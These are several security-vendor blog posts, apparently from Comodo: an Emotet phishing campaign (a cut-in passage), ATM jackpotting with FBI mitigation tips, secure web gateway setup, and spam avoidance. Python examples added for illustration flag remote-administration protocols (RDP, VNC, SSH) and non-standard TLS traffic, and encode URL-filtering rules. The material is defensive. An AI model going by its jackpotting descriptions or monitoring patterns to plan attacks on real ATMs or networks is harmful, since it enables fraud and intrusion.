“In this case, we faced a very dangerous attack with far-reaching implications,” says Fatih Orhan, the Head of Comodo Threat Research Labs. “Obviously, such immense attacks are aimed at infecting as many users as possible, but that’s only the tip of the iceberg.

Infecting victims with Emotet just triggers the devastating process. First, it infects other hosts in the network. Second, it downloads other types of malware, so the infection process of the compromised PCs becomes endless and grows exponentially. By stopping this massive attack, Comodo protected tens of thousands of users from this cunning malware and cut the killing chain of the attackers. This case is one more confirmation that our customers are protected even from the most dangerous and powerful attacks.”

Live secure with Comodo!

The heatmap and IPs used in the attack

The attack was conducted from three Cyprus-based IPs and the sender domain @tekdiyar.com.tr. It started on July 23, 2018 at 14:17:55 UTC and ended on July 27, 2018 at 01:06:00 UTC.
The attackers sent 28,294 phishing emails.



New malware threat means bad news for ATMs


The most memorable cyber attack demonstration I’ve ever seen was Barnaby Jack’s ATM jackpotting presentation at Black Hat 2010. (Rest in peace, Barnaby Jack.) He exploited vulnerabilities in two third-party ATM models made by Triton and Tranax. He bought the ATM devices himself so he could research them and take them to the event. Both ran a version of Microsoft Windows CE. It’s eight years later, and embedded versions of Windows 7 and Windows 10 are two of the most common ATM operating systems.

Barnaby Jack began by remotely connecting to the Tranax ATM from his laptop. From there he executed his Jackpot malware, which caused the ATM to play music and spit out its money in a dramatic and messy way. If that happened in the real world, bystanders would probably be running to the ATM to grab as much cash as they possibly could. For his second attack, he put his USB stick into the Triton ATM. His Scrooge rootkit enabled him to rewrite the device’s firmware. Through the malicious firmware, Barnaby Jack was able to withdraw cash from the ATM without needing to use an authenticated bank account. No numbers changed in any bank accounts; the Triton ATM just released its cash as the Tranax ATM did. When a cyber attack causes an ATM to release cash without taking the money from a bank account or credit card, that’s called jackpotting.

The vulnerable ATMs could be found, targeted, and exploited by war driving if the device presented any sort of wireless network connectivity. (War driving is the act of looking for WLANs or WiFi connected devices while walking or driving around an area with a WiFi transceiver.)

Fast forward to November 2017. The FBI caught three men visiting ATMs in Wyoming, Colorado, and Utah together to engage in jackpotting attacks which helped them steal tens of thousands of dollars. Surveillance camera footage from one attack showed the men opening the top of an ATM in order to physically deploy Ploutus.D malware. The FBI said:

“Often the malware requires entering of codes to dispense cash. Codes can be obtained by a third party, not at the location, who then provides the codes to the subjects at the ATM. This allows the third party to know how much cash is dispensed from the ATM, preventing those who are physically at the ATM from keeping cash for themselves instead of providing it to the criminal organization. The use of mobile phones is often used to obtain these dispensing codes.”

On August 10th, the FBI sent an alert to banks around the world. Apparently, jackpotting attacks are a bigger threat than ever, and banking institutions must be vigilant. All successful jackpotting attacks to date have involved physically deploying malware to targeted ATMs, one at a time.

“The FBI has obtained unspecified reporting indicating cyber criminals are planning to conduct a global Automated Teller Machine (ATM) cash-out scheme in the coming days, likely associated with an unknown card issuer breach. Historic compromises have included small-to-medium size financial institutions, likely due to less robust implementation of cyber security controls, budgets, or third-party vendor vulnerabilities. The FBI expects the ubiquity of this activity to continue or possibly increase in the near future.”

Another jackpotting attack methodology the FBI warns about involves magnetic strip cards. “The cyber criminals typically create fraudulent copies of legitimate cards by sending stolen card data to co-conspirators who imprint the data on reusable magnetic strip cards, such as gift cards purchased at retail stores. At a pre-determined time, the co-conspirators withdraw account funds from ATMs using these cards.”

ATM manufacturers like Diebold, Tranax, and Triton must work with Microsoft to deploy better patches against jackpotting malware. Also, ATM manufacturers and banks should never use operating systems that are no longer supported with security patches. That’s been a common problem all around the world.

The FBI has some additional tips.

  • Implement application whitelisting to make it more difficult for malware to be executed on an ATM.
  • Separation of duties or dual authentication procedures should be implemented for withdrawal increases above a certain threshold.
  • Watch for TLS traffic from non-standard ports.
  • Look for network connections made from outside the geographic area that would be atypical of the bank’s outbound connections.
  • Monitor for the presence of remote network protocols and administrative tools.
  • And finally, be very careful to monitor and limit user accounts that have privileges to modify ATMs or bank accounts in any way.
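The three network-monitoring tips above (TLS on non-standard ports, connections outside the bank’s usual area, and remote administration protocols) can be checked mechanically against flow records. The following Python is an added example, not code from the FBI or from this post: the flow-record format, the allowlisted destination networks, and the port-to-tool mapping are all constructed for illustration, and an allowlist of expected destination networks stands in for a real GeoIP lookup.

```python
import ipaddress
from dataclasses import dataclass, field

# Constructed policy for a fictional bank. An allowlist of destination networks stands in
# for "the bank's geographic area" (real deployments would add a GeoIP lookup), and the
# port map covers the remote-administration protocols the tips say to monitor.
EXPECTED_DST_NETS = [ipaddress.ip_network(n) for n in ("10.20.0.0/16", "203.0.113.0/24")]
STANDARD_TLS_PORTS = {443, 8443}          # TLS seen on any other port is the "non-standard port" tip
REMOTE_ADMIN = {3389: "RDP", 5900: "VNC", 22: "SSH", 5985: "WinRM", 5986: "WinRM"}

@dataclass
class Flow:
    src: str
    dst: str
    dport: int
    app: str                               # protocol identified by the sensor, e.g. "tls", "rdp"
    findings: list = field(default_factory=list)

def parse_flow(line: str) -> Flow:
    """Parse one constructed 'key=value key=value ...' flow record."""
    kv = dict(part.split("=", 1) for part in line.split())
    return Flow(kv["src"], kv["dst"], int(kv["dport"]), kv["app"].lower())

def inspect(flow: Flow) -> Flow:
    """Attach one finding for each of the three network tips the flow violates."""
    if flow.app == "tls" and flow.dport not in STANDARD_TLS_PORTS:
        flow.findings.append(f"tls-on-nonstandard-port:{flow.dport}")
    if not any(ipaddress.ip_address(flow.dst) in net for net in EXPECTED_DST_NETS):
        flow.findings.append("destination-outside-expected-area")
    tool = REMOTE_ADMIN.get(flow.dport)
    if tool or flow.app.upper() in REMOTE_ADMIN.values():
        flow.findings.append(f"remote-admin-protocol:{tool or flow.app.upper()}")
    return flow

def scan(lines) -> list:
    """Return only the flows that produced at least one finding."""
    flows = (inspect(parse_flow(line)) for line in lines if line.strip())
    return [flow for flow in flows if flow.findings]

# Constructed sample records: two ordinary ATM flows followed by two that should alert.
SAMPLE_FLOWS = [
    "src=10.20.5.11 dst=10.20.1.10 dport=443 app=tls",      # ATM to the internal host switch
    "src=10.20.5.11 dst=203.0.113.7 dport=443 app=tls",     # ATM to the processor's range
    "src=10.20.5.12 dst=198.51.100.23 dport=8081 app=tls",  # TLS on an odd port to an unexpected host
    "src=10.20.5.13 dst=10.20.1.50 dport=3389 app=rdp",     # RDP inside the ATM segment
]

if __name__ == "__main__":
    for flow in scan(SAMPLE_FLOWS):
        print(f"{flow.src} -> {flow.dst}:{flow.dport} {', '.join(flow.findings)}")
```

Each finding maps back to one of the FBI tips, so the same records can feed whichever alerting pipeline the bank already runs.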

It seems that the FBI has reason to believe that many financial institutions don’t monitor their ATMs as thoroughly as they should. If ATMs aren’t configured to specifically whitelist the applications they were designed to use, that’s a serious security flaw that’s easily avoidable. The successful jackpotting attacks so far usually involve the attacker physically tampering with their targeted ATMs. Is there a way for police or armed security guards to be deployed to ATMs within a few minutes of tampering being caught on camera?

The financial incentive for banks to put serious effort into security hardening against jackpotting attacks couldn’t possibly be more obvious. I’d love to see the Beagle Boys try these sorts of attacks on DuckTales. Disney rebooted that show? Well, thanks for the childhood nostalgia!

Tips to Make Your Web Gateway Secure


With a heavy flow of new security threats targeting organizations for their data and money, IT security teams are finding it a daunting task to keep out ever-evolving, sophisticated threats. A secure web gateway is a key product in any organization’s security, and how it is implemented, configured and maintained determines the level of security it actually provides.

In this article we discuss how a web security gateway works to secure the organization from threats. Read on to know more.

Choosing the right strategy to deploy a web security gateway

One main factor in protecting your organization’s network is choosing the right Secure Web Gateway, with the right set of features, which include:

• HTTPS scanning
• URL Filtering
• Threat Intelligence feeds
• Mobile Support
• Data Loss Prevention
• Application Control
• Threat and Traffic Visualization

Organizations should frame strict security objectives, understanding the advantages and disadvantages of the implementation and the strategies to be followed. This lets the organization gain more of the benefits of a secure web gateway. Cloud-based Web Security Gateways are growing in popularity, and interest in them seems to be outweighing on-premise systems. There is also the option to deploy a combination of cloud and on-premise, which is becoming common too.


Integrating a Web Security Gateway with other Endpoint Security Products

Secondly, before deploying a Web Security Gateway, it is vital to review the existing security controls. It is also important to understand the purpose of the other security devices on the network, what they are installed and configured to mitigate, and the rules and filters they implement to enforce security policies. Never fail to educate employees about recent social media attacks. Above all, check whether the web security gateway is easy to integrate with the existing endpoint security products, to avoid interruptions in delivering network protection.

Mapping Acceptable Use and Compliance Policies to Rule Sets


Organizations should look into the usage of social websites and take control over it. A Web Security Gateway can streamline the security process by enforcing strict rules and security policies that govern the flow of traffic, and it gives a granular level of control over specific applications.
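As an added example (not part of the original article or of any vendor’s product), the following Python shows how an acceptable-use policy for social media and file-sharing sites can be expressed as an ordered rule set that combines URL filtering, application control by HTTP method and a DLP hand-off. The domain categories and the rules are constructed for illustration; a real gateway takes its categorization from a threat-intelligence feed.

```python
from dataclasses import dataclass
from urllib.parse import urlsplit

@dataclass(frozen=True)
class Rule:
    category: str        # URL category the rule applies to, or "*" for any category
    methods: frozenset   # HTTP methods it covers; an empty set means all methods
    action: str          # "allow", "block" or "dlp-inspect"
    reason: str          # text shown in the alert or on the block page

# Constructed domain-to-category map; a real gateway takes this from a vendor feed.
CATEGORIES = {
    "facebook.com": "social-media",
    "twitter.com": "social-media",
    "dropbox.com": "file-sharing",
    "intranet.example": "internal",
}

# Ordered rule set: first match wins, and the final wildcard makes the default explicit.
RULES = [
    Rule("internal", frozenset(), "allow", "corporate applications"),
    Rule("file-sharing", frozenset({"POST", "PUT"}), "block", "uploads to personal cloud storage"),
    Rule("file-sharing", frozenset(), "allow", "downloads from file-sharing sites permitted"),
    Rule("social-media", frozenset({"POST", "PUT"}), "dlp-inspect", "outbound posts scanned for sensitive data"),
    Rule("social-media", frozenset(), "allow", "read-only browsing permitted"),
    Rule("*", frozenset(), "block", "uncategorized or unlisted site denied by default"),
]

def categorize(host: str) -> str:
    """Walk from the full host name up through its parent domains.
    Matching whole labels means 'evilfacebook.com' does not inherit the
    'facebook.com' category, which a naive substring check would allow."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        category = CATEGORIES.get(".".join(labels[i:]))
        if category:
            return category
    return "uncategorized"

def decide(method: str, url: str) -> tuple:
    """Return (action, category, reason) for one request."""
    category = categorize(urlsplit(url).hostname or "")
    for rule in RULES:
        if rule.category in (category, "*") and (not rule.methods or method.upper() in rule.methods):
            return rule.action, category, rule.reason
    return "block", category, "no matching rule"   # unreachable with the wildcard, kept as a safety net

if __name__ == "__main__":
    for req in [("GET", "https://www.facebook.com/feed"), ("POST", "https://www.facebook.com/upload"),
                ("PUT", "https://content.dropbox.com/f"), ("GET", "https://evilfacebook.com/login")]:
        print(req, "->", decide(*req))
```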


Setting up a Standard Procedure for Reviewing and Examining the Alerts and Enhancing Rule Sets

When a specific rule is violated, the web security gateway raises an alert. When you have to deal with multiple incidents, it is critical to prioritize events. Incidents that involve highly valuable business data, and those that can be easily compromised, should be prioritized and investigated immediately.

The effectiveness of a Secure Web Gateway is evaluated by monitoring the type and number of incidents and alerts. Visually mapping and regularly tracking the type of traffic lets IT admins reduce false alerts. Set procedures and processes to conduct audits that verify whether the rule sets are serving their intended purpose and implementing the security policy correctly.


5 Easy Ways to Stop Spam Emails


Nearly half of all the emails sent in the entire world are spam. That’s a LOT of spam to clear. And spam isn’t new; it’s been around since the invention of email (in the 1980s). While spam may seem easily avoidable for some people, it remains the no. 1 way for viruses and other types of malware to enter computers or even entire networks.

This article will explain what to look out for, provide some tips on ways to stop spam emails (even those that look very real) and show how you can reduce your exposure to spam.

#1 Train your spam filter

When you get a spam email from an unknown sender, don’t just delete it. Select it, and mark it as a spam message. Sometimes, your email client may mark an important email from a known sender as spam. In such scenarios, you need to mark that email as safe to train the email client about your false positives.

#2 Never respond to spam

If you receive a spam email and recognize it before opening it, don’t open it. If you realize an email is spam only after opening it, mark it as spam and close it. Do not click the links or buttons, or download files from spam messages.

#3 Use alternative email addresses

A lot of unwanted emails can make their way into your inbox if you order a product or subscribe to a mailing list. By ordering a product or subscribing to a mailing list of a company, you are automatically signed up to receive unwanted marketing updates from that company, or it may share your contact information with a third-party advertiser.

One simple solution to stop such spam emails is to create a secondary email address that you can use for such activities. By doing so, those unwanted marketing emails will not appear in your primary email inbox.

#4 Hide your email address

The more widely your email address is exposed, the more spam emails you are going to get. So keep your email address hidden from public view: avoid publishing your primary email address on the web unless it is required, and use alternative email addresses for such scenarios.

#5 Use a third-party Anti-spam filter

Most of the anti-spam solutions available today can be customized to your needs, allowing only approved emails into your inbox. There is free anti-spam software as well as paid anti-spam software.

Comodo Dome Antispam is one such solution which can quickly identify and filter spam emails from your inbox. It uses advanced spam filters, and content analysis engines to detect and prevent unsolicited emails from entering your network.

If you are in search of a good anti-spam solution that stops spam emails, look no further: get Comodo Dome Anti-spam today!
